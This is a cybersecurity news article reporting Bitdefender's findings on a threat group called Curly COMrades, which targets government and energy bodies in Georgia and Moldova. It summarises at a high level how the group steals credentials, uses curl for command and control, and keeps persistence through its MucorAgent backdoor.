technology, artificial intelligence, futuristic, intelligent, brain, communication, information, robot, network, human, blue technology, blue brain, blue network, blue community, blue robot, blue communication, blue information, blue human, artificial intelligence, artificial intelligence, artificial intelligence, artificial intelligence, artificial intelligence, brain, robot, robot, robot, blue brain
| |

New APT group ‘Curly COMrades’ targeting Georgia and Moldova

Byinfosectoday.com

A previously undocumented threat actor, dubbed Curly COMrades, has been observed targeting entities in Georgia and Moldova as part of a cyber espionage campaign aimed at facilitating long-term access to target networks. They have repeatedly attempted to extract the NTDS database from domain controllers, which serve as the primary repository for user password hashes and authentication data in a Windows network. Additionally, they have sought to dump LSASS memory from specific systems to recover active user credentials, potentially including plain-text passwords from machines where users were logged on. This activity has been tracked by Bitdefender, a Romanian cybersecurity company, since mid-2024, focusing on judicial and government bodies in Georgia, as well as an energy distribution company in Moldova. While the campaign has been monitored since mid-2024, analysis of the artifacts suggests that the activity began earlier, with the earliest confirmed use of the MucorAgent malware dating back to November 2023.

Curly COMrades are believed to operate with objectives aligned with Russia’s geopolitical strategy. The group derives its name from its heavy reliance on the curl utility for command-and-control (C2) and data transfer, alongside the hijacking of Component Object Model (COM) objects. The ultimate goal of these attacks is to enable long-term access for reconnaissance and credential theft, allowing them to burrow deeper into networks, collect data using custom tools, and exfiltrate information to attacker-controlled infrastructure. Their operations exhibit a methodical approach, combining standard attack techniques with tailored implementations to blend into legitimate system activity. Notably, they utilise legitimate tools such as Resocks, SSH, and Stunnel to create multiple conduits into internal networks and remotely execute commands using stolen credentials. Persistent access to infected endpoints is achieved through a bespoke backdoor called MucorAgent, which hijacks class identifiers (CLSIDs) to target the Native Image Generator (Ngen), a component of the .NET Framework that facilitates persistence via a disabled scheduled task. 

Similar Posts